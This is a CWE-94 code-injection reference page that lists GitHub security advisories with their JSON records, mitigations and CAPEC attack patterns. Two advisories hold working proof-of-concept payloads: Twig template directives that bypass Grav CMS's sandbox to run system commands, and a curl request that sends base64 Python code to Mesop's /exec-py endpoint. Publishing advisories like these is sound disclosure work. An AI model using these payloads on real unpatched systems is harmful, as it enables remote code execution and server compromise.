CWE-94
Allowed-with-ReviewImproper Control of Generation of Code ('Code Injection')
Abstraction: Base · Status: Draft
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
8272 vulnerabilities reference this CWE, most recent first.
GHSA-GHMF-69XR-JMCG
Vulnerability from github – Published: 2022-05-17 05:04 – Updated: 2025-04-11 04:13The Agent (aka AgentController) servlet in HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager (IDM) 4.0 allows remote attackers to execute arbitrary commands via a HEAD request, aka ZDI-CAN-1745.
{
"affected": [],
"aliases": [
"CVE-2013-4813"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-09-16T13:01:00Z",
"severity": "HIGH"
},
"details": "The Agent (aka AgentController) servlet in HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager (IDM) 4.0 allows remote attackers to execute arbitrary commands via a HEAD request, aka ZDI-CAN-1745.",
"id": "GHSA-ghmf-69xr-jmcg",
"modified": "2025-04-11T04:13:46Z",
"published": "2022-05-17T05:04:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4813"
},
{
"type": "WEB",
"url": "http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?docId=emr_na-c03897409"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/54788"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1029010"
},
{
"type": "WEB",
"url": "http://zerodayinitiative.com/advisories/ZDI-13-228"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GHMJ-7H5Q-Q89G
Vulnerability from github – Published: 2022-05-01 18:44 – Updated: 2022-05-01 18:44showCode.php in xml2owl 0.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path parameter.
{
"affected": [],
"aliases": [
"CVE-2007-6632"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-01-04T00:46:00Z",
"severity": "MODERATE"
},
"details": "showCode.php in xml2owl 0.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the path parameter.",
"id": "GHSA-ghmj-7h5q-q89g",
"modified": "2022-05-01T18:44:58Z",
"published": "2022-05-01T18:44:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2007-6632"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39327"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/4800"
},
{
"type": "WEB",
"url": "http://osvdb.org/39880"
},
{
"type": "WEB",
"url": "http://www.inj3ct-it.org/exploit/xml2owl-0.1.1.rce.txt"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/27050"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GHQ9-VC6F-8QJF
Vulnerability from github – Published: 2026-04-01 00:03 – Updated: 2026-04-01 00:03Impact
TorchGeo 0.4–0.6.0 used an eval statement in its model weight API that could allow an unauthenticated, remote attacker to execute arbitrary commands. All platforms that expose torchgeo.models.get_weight() or torchgeo.trainers as an external API could be affected.
Patches
The eval statement was replaced with a fixed enum lookup, preventing arbitrary code injection. All users are encouraged to upgrade to TorchGeo 0.6.1 or newer.
Workarounds
In unpatched versions, input validation and sanitization can be used to avoid this vulnerability.
References
Bug history
- Introduced: https://github.com/torchgeo/torchgeo/pull/917
- Patched: https://github.com/torchgeo/torchgeo/pull/2323
- Released: v0.6.1
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.0"
},
"package": {
"ecosystem": "PyPI",
"name": "torchgeo"
},
"ranges": [
{
"events": [
{
"introduced": "0.4"
},
{
"fixed": "0.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-49048"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T00:03:56Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nTorchGeo 0.4\u20130.6.0 used an [`eval`](https://docs.python.org/3/library/functions.html#eval) statement in its model weight API that could allow an unauthenticated, remote attacker to execute arbitrary commands. All platforms that expose [`torchgeo.models.get_weight()`](https://torchgeo.readthedocs.io/en/v0.6.0/api/models.html#torchgeo.models.get_weight) or [`torchgeo.trainers`](https://torchgeo.readthedocs.io/en/v0.6.0/api/trainers.html) as an external API could be affected.\n\n### Patches\n\nThe `eval` statement was replaced with a fixed enum lookup, preventing arbitrary code injection. All users are encouraged to upgrade to TorchGeo 0.6.1 or newer.\n\n### Workarounds\n\nIn unpatched versions, input validation and sanitization can be used to avoid this vulnerability.\n\n### References\n\n#### Bug history\n\n* Introduced: https://github.com/torchgeo/torchgeo/pull/917\n* Patched: https://github.com/torchgeo/torchgeo/pull/2323\n* Released: [v0.6.1](https://github.com/microsoft/torchgeo/releases/tag/v0.6.1)",
"id": "GHSA-ghq9-vc6f-8qjf",
"modified": "2026-04-01T00:03:56Z",
"published": "2026-04-01T00:03:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/torchgeo/torchgeo/security/advisories/GHSA-ghq9-vc6f-8qjf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49048"
},
{
"type": "WEB",
"url": "https://github.com/torchgeo/torchgeo/pull/2323"
},
{
"type": "WEB",
"url": "https://github.com/torchgeo/torchgeo/pull/917"
},
{
"type": "WEB",
"url": "https://github.com/torchgeo/torchgeo/commit/1a980788cb7089a1115f3b786c7daa9dd47d7d7a"
},
{
"type": "WEB",
"url": "https://github.com/microsoft/torchgeo/releases/tag/v0.6.1"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/torchgeo/PYSEC-2024-204.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/torchgeo/torchgeo"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49048"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "TorchGeo Remote Code Execution Vulnerability"
}
GHSA-GHVV-MG26-G3C9
Vulnerability from github – Published: 2025-05-14 21:31 – Updated: 2025-05-14 21:31A code injection vulnerability in the Palo Alto Networks Cortex XDR® Broker VM allows an authenticated user to execute arbitrary code with root privileges on the host operating system running Broker VM.
{
"affected": [],
"aliases": [
"CVE-2025-0134"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-14T19:15:51Z",
"severity": "MODERATE"
},
"details": "A code injection vulnerability in the Palo Alto Networks Cortex XDR\u00ae Broker VM allows an authenticated user to execute arbitrary code with root privileges on the host operating system running Broker VM.",
"id": "GHSA-ghvv-mg26-g3c9",
"modified": "2025-05-14T21:31:18Z",
"published": "2025-05-14T21:31:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0134"
},
{
"type": "WEB",
"url": "https://security.paloaltonetworks.com/CVE-2025-0134"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:C/RE:M/U:Amber",
"type": "CVSS_V4"
}
]
}
GHSA-GJ59-76XC-HW5Q
Vulnerability from github – Published: 2022-05-01 07:28 – Updated: 2022-05-01 07:28PHP remote file inclusion vulnerability in archive/archive_topic.php in pbpbb archive for search engines (SearchIndexer) (aka phpBBSEI) for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
{
"affected": [],
"aliases": [
"CVE-2006-5418"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2006-10-20T14:07:00Z",
"severity": "MODERATE"
},
"details": "PHP remote file inclusion vulnerability in archive/archive_topic.php in pbpbb archive for search engines (SearchIndexer) (aka phpBBSEI) for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.",
"id": "GHSA-gj59-76xc-hw5q",
"modified": "2022-05-01T07:28:05Z",
"published": "2022-05-01T07:28:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-5418"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29569"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/2549"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/22443"
},
{
"type": "WEB",
"url": "http://securityreason.com/securityalert/1751"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/448621/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/20571"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2006/4037"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GJC5-8CFH-653X
Vulnerability from github – Published: 2025-12-02 00:36 – Updated: 2025-12-02 00:36Summary
Grav CMS is vulnerable to a Server-Side Template Injection (SSTI) that allows any authenticated user with editor permissions to execute arbitrary code on the remote server, bypassing the existing security sandbox.
Details
Grav CMS uses a custom sandbox to protect the powerful Twig methods such as registerUndefinedFilterCallback(). These methods are designed to prevent SSTI attacks by denying the execution of dangerous PHP functions (e.g., exec(), passthru(), system(), etc.) within Twig template directives.
The current defense mechanism relies on a blacklist of prohibited functions (PHP, Twig), checked through the isDangerousFunction() method in the file system/src/Grav/Common/Twig.php:
$this->twig->registerUndefinedFilterCallback(function (string $name) use ($config) {
$allowed = $config->get('system.twig.safe_filters');
if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {
return new TwigFilter($name, $name);
}
if ($config->get('system.twig.undefined_filters')) {
if (function_exists($name)) {
if (!Utils::isDangerousFunction($name)) {
user_error("PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`", E_USER_DEPRECATED);
return new TwigFilter($name, $name);
}
/** @var Debugger $debugger */
$debugger = $this->grav['debugger'];
$debugger->addException(new RuntimeException("Blocked potentially dangerous PHP function {$name}() being used as Twig filter. If you really want to use it, please add it to system configuration: `system.twig.safe_filters`"));
}
return new TwigFilter($name, static function () {});
}
return false;
});
In this code, the isDangerousFunction() check is bypassed if the filter defined in the $name variable is considered safe. Only an administrator can mark a function as safe by adding it to the system.twig.safe_filters configuration properties (whitelists that are empty by default) in the system/config/system.yaml file.
Notably, the Twig class is defined within the system/src/Grav/Common/Twig.php file, and the Twig object (and environment) is instantiated there:
/**
* Class Twig
* @package Grav\Common\Twig
*/
class Twig
{
/** @var Environment */
public $twig;
/** @var array */
public $twig_vars = [];
/** @var array */
public $twig_paths;
/** @var string */
public $template;
// Constructor
public function __construct(Grav $grav)
{
$this->grav = $grav;
$this->twig_paths = [];
}
// Twig initialization method
public function init()
{
if (null === $this->twig) {
/** @var Config $config */
$config = $this->grav['config'];
/** @var UniformResourceLocator $locator */
$locator = $this->grav['locator'];
/** @var Language $language */
$language = $this->grav['language'];
$active_language = $language->getActive();
...
}
}
}
Since the security sandbox does not fully protect the Twig object, it is possible to interact with it (e.g., call methods, read/write attributes) through maliciously crafted Twig template directives injected into a web page. This allows an authenticated editor to add arbitrary functions to the Twig attribute system.twig.safe_filters, effectively bypassing the Grav CMS sandbox.
Proof of Concept (PoC)
An authenticated user with permission to edit a page (with Twig processing enabled) in the Grav CMS admin console can inject malicious template directives to execute arbitrary OS commands on the remote web server.
For example, to exploit the vulnerability and execute the prohibited system('id') command, bypassing the sandbox, an editor could create/edit a web page with the following template directives:
{% set arr = {'1':'system', '2':'exec'} %}
{{ var_dump(grav.twig.twig_vars['config'].set('system.twig.safe_filters', arr)) }}
{{ 'id'|system }}
{{ 'whoami'|exec }}
Once the page is saved, it can be accessed by unauthenticated users, triggering the execution of the system('id') command on the server hosting the vulnerable Grav CMS.
Impact
The vulnerability allows remote code execution on the underlying server, which could lead to full server compromise.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "getgrav/grav"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.8.0-beta.27"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66299"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-02T00:36:36Z",
"nvd_published_at": "2025-12-01T22:15:49Z",
"severity": "HIGH"
},
"details": "## Summary\n\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI) that allows any authenticated user with editor permissions to execute arbitrary code on the remote server, bypassing the existing security sandbox.\n\n## Details\n\nGrav CMS uses a custom sandbox to protect the powerful Twig methods such as `registerUndefinedFilterCallback()`. These methods are designed to prevent SSTI attacks by denying the execution of dangerous PHP functions (e.g., `exec()`, `passthru()`, `system()`, etc.) within Twig template directives.\n\nThe current defense mechanism relies on a blacklist of prohibited functions (PHP, Twig), checked through the `isDangerousFunction()` method in the file `system/src/Grav/Common/Twig.php`:\n\n```php\n$this-\u003etwig-\u003eregisterUndefinedFilterCallback(function (string $name) use ($config) {\n $allowed = $config-\u003eget(\u0027system.twig.safe_filters\u0027);\n if (is_array($allowed) \u0026\u0026 in_array($name, $allowed, true) \u0026\u0026 function_exists($name)) {\n return new TwigFilter($name, $name);\n }\n if ($config-\u003eget(\u0027system.twig.undefined_filters\u0027)) {\n if (function_exists($name)) {\n if (!Utils::isDangerousFunction($name)) {\n user_error(\"PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`\", E_USER_DEPRECATED);\n\n return new TwigFilter($name, $name);\n }\n\n /** @var Debugger $debugger */\n $debugger = $this-\u003egrav[\u0027debugger\u0027];\n $debugger-\u003eaddException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig filter. If you really want to use it, please add it to system configuration: `system.twig.safe_filters`\"));\n }\n\n return new TwigFilter($name, static function () {});\n }\n\n return false;\n});\n```\n\nIn this code, the `isDangerousFunction()` check is bypassed if the filter defined in the $name variable is considered safe. Only an administrator can mark a function as safe by adding it to the `system.twig.safe_filters` configuration properties (whitelists that are empty by default) in the `system/config/system.yaml` file.\n\nNotably, the Twig class is defined within the `system/src/Grav/Common/Twig.php` file, and the Twig object (and environment) is instantiated there:\n\n```php\n/**\n * Class Twig\n * @package Grav\\Common\\Twig\n */\nclass Twig\n{\n /** @var Environment */\n public $twig;\n /** @var array */\n public $twig_vars = [];\n /** @var array */\n public $twig_paths;\n /** @var string */\n public $template;\n\n // Constructor\n public function __construct(Grav $grav)\n {\n $this-\u003egrav = $grav;\n $this-\u003etwig_paths = [];\n }\n\n // Twig initialization method\n public function init()\n {\n if (null === $this-\u003etwig) {\n /** @var Config $config */\n $config = $this-\u003egrav[\u0027config\u0027];\n /** @var UniformResourceLocator $locator */\n $locator = $this-\u003egrav[\u0027locator\u0027];\n /** @var Language $language */\n $language = $this-\u003egrav[\u0027language\u0027];\n\n $active_language = $language-\u003egetActive();\n ...\n }\n }\n}\n```\n\nSince the security sandbox does not fully protect the Twig object, it is possible to interact with it (e.g., call methods, read/write attributes) through maliciously crafted Twig template directives injected into a web page. This allows an authenticated editor to add arbitrary functions to the Twig attribute `system.twig.safe_filters`, effectively bypassing the Grav CMS sandbox.\n\n## Proof of Concept (PoC)\nAn authenticated user with permission to edit a page (with Twig processing enabled) in the Grav CMS admin console can inject malicious template directives to execute arbitrary OS commands on the remote web server.\n\nFor example, to exploit the vulnerability and execute the prohibited `system(\u0027id\u0027)` command, bypassing the sandbox, an editor could create/edit a web page with the following template directives:\n\n```twig\n{% set arr = {\u00271\u0027:\u0027system\u0027, \u00272\u0027:\u0027exec\u0027} %}\n{{ var_dump(grav.twig.twig_vars[\u0027config\u0027].set(\u0027system.twig.safe_filters\u0027, arr)) }}\n{{ \u0027id\u0027|system }}\n{{ \u0027whoami\u0027|exec }}\n```\n\nOnce the page is saved, it can be accessed by unauthenticated users, triggering the execution of the `system(\u0027id\u0027)` command on the server hosting the vulnerable Grav CMS.\n\n## Impact\nThe vulnerability allows remote code execution on the underlying server, which could lead to full server compromise.",
"id": "GHSA-gjc5-8cfh-653x",
"modified": "2025-12-02T00:36:36Z",
"published": "2025-12-02T00:36:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66299"
},
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
},
{
"type": "PACKAGE",
"url": "https://github.com/getgrav/grav"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Grav is Vulnerable to Security Sandbox Bypass with SSTI (Server Side Template Injection)"
}
GHSA-GJGM-JF57-VJ75
Vulnerability from github – Published: 2022-05-01 07:23 – Updated: 2022-05-01 07:23PHP remote file inclusion vulnerability in includes/pear/Net/DNS/RR.php in ProgSys 0.151 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpdns_basedir parameter.
{
"affected": [],
"aliases": [
"CVE-2006-4944"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2006-09-23T00:07:00Z",
"severity": "HIGH"
},
"details": "PHP remote file inclusion vulnerability in includes/pear/Net/DNS/RR.php in ProgSys 0.151 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpdns_basedir parameter.",
"id": "GHSA-gjgm-jf57-vj75",
"modified": "2022-05-01T07:23:25Z",
"published": "2022-05-01T07:23:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-4944"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29078"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/2411"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/20141"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GJGX-RVQR-6W6V
Vulnerability from github – Published: 2026-03-18 20:05 – Updated: 2026-03-20 21:23Summary
An explicit web endpoint inside the ai/ testing module infrastructure directly ingests untrusted Python code strings unconditionally without authentication measures, yielding standard Unrestricted Remote Code Execution. Any individual capable of routing HTTP logic to this server block will gain explicit host-machine command rights.
Details
The AI codebase package includes a lightweight debugging Flask server inside ai/sandbox/wsgi_app.py. The /exec-py route accepts base_64 encoded raw string payloads inside the code parameter natively evaluated by a basic POST web request. It saves it rapidly to the operating system logic path and injects it recursively using execute_module(module_path...).
# ai/sandbox/wsgi_app.py
@flask_app.route("/exec-py", methods=["POST"])
def exec_py_route():
code = base64.urlsafe_b64decode(request.form.get("code"))
# ... code is blindly written to file and forcefully executed
PoC
# Payload:
# import os
# os.system('echo "pwned by attacker" > /tmp/pwned.txt')
#
# Base64 string represents the identical payload block above:
# aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ==
curl -X POST http://<target_ip_address_hosting_sandbox>:port/exec-py \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "code=aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ=="
# Validate exploitation target execution natively:
# $ cat /tmp/pwned.txt
# pwned by attacker
Impact
This presents trivial severity for systems publicly exposed or lacking strictly verified boundary firewalls due to absolute unauthenticated command injection privileges targeting the direct execution interpreter running this service sandbox.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.2.2"
},
"package": {
"ecosystem": "PyPI",
"name": "mesop"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33057"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-18T20:05:00Z",
"nvd_published_at": "2026-03-20T08:16:11Z",
"severity": "CRITICAL"
},
"details": "#### Summary\nAn explicit web endpoint inside the `ai/` testing module infrastructure directly ingests untrusted Python code strings unconditionally without authentication measures, yielding standard Unrestricted Remote Code Execution. Any individual capable of routing HTTP logic to this server block will gain explicit host-machine command rights.\n\n#### Details\nThe AI codebase package includes a lightweight debugging Flask server inside `ai/sandbox/wsgi_app.py`. The `/exec-py` route accepts base_64 encoded raw string payloads inside the `code` parameter natively evaluated by a basic `POST` web request. It saves it rapidly to the operating system logic path and injects it recursively using `execute_module(module_path...)`.\n\n```python\n# ai/sandbox/wsgi_app.py\n@flask_app.route(\"/exec-py\", methods=[\"POST\"])\ndef exec_py_route():\n code = base64.urlsafe_b64decode(request.form.get(\"code\"))\n # ... code is blindly written to file and forcefully executed\n```\n\n#### PoC\n```bash\n# Payload:\n# import os\n# os.system(\u0027echo \"pwned by attacker\" \u003e /tmp/pwned.txt\u0027)\n# \n# Base64 string represents the identical payload block above: \n# aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ==\n\ncurl -X POST http://\u003ctarget_ip_address_hosting_sandbox\u003e:port/exec-py \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n -d \"code=aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ==\"\n\n# Validate exploitation target execution natively:\n# $ cat /tmp/pwned.txt\n# pwned by attacker\n```\n\n#### Impact\nThis presents trivial severity for systems publicly exposed or lacking strictly verified boundary firewalls due to absolute unauthenticated command injection privileges targeting the direct execution interpreter running this service sandbox.",
"id": "GHSA-gjgx-rvqr-6w6v",
"modified": "2026-03-20T21:23:51Z",
"published": "2026-03-18T20:05:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-gjgx-rvqr-6w6v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33057"
},
{
"type": "WEB",
"url": "https://github.com/mesop-dev/mesop/commit/825f55970c20686de3f28e2c66df4d74e9d4db47"
},
{
"type": "PACKAGE",
"url": "https://github.com/mesop-dev/mesop"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Mesop Affected by Unauthenticated Remote Code Execution via Test Suite Route /exec-py"
}
GHSA-GJMF-2QM5-Q5M2
Vulnerability from github – Published: 2025-08-26 21:31 – Updated: 2025-08-26 21:31NVIDIA NeMo Framework for all platforms contains a vulnerability in the NLP component, where malicious data created by an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.
{
"affected": [],
"aliases": [
"CVE-2025-23313"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-26T19:15:38Z",
"severity": "HIGH"
},
"details": "NVIDIA NeMo Framework for all platforms contains a vulnerability in the NLP component, where malicious data created by an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.",
"id": "GHSA-gjmf-2qm5-q5m2",
"modified": "2025-08-26T21:31:06Z",
"published": "2025-08-26T21:31:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23313"
},
{
"type": "WEB",
"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5689"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23313"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GJPX-9J96-M8GX
Vulnerability from github – Published: 2021-12-16 00:02 – Updated: 2022-07-13 00:01Microsoft Defender for IoT Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-41365, CVE-2021-42311, CVE-2021-42313, CVE-2021-42314, CVE-2021-42315, CVE-2021-43882, CVE-2021-43889.
{
"affected": [],
"aliases": [
"CVE-2021-42310"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-15T15:15:00Z",
"severity": "CRITICAL"
},
"details": "Microsoft Defender for IoT Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-41365, CVE-2021-42311, CVE-2021-42313, CVE-2021-42314, CVE-2021-42315, CVE-2021-43882, CVE-2021-43889.",
"id": "GHSA-gjpx-9j96-m8gx",
"modified": "2022-07-13T00:01:42Z",
"published": "2021-12-16T00:02:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42310"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42310"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Strategy: Refactoring
Refactor your program so that you do not have to dynamically generate code.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-242: Code Injection
An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.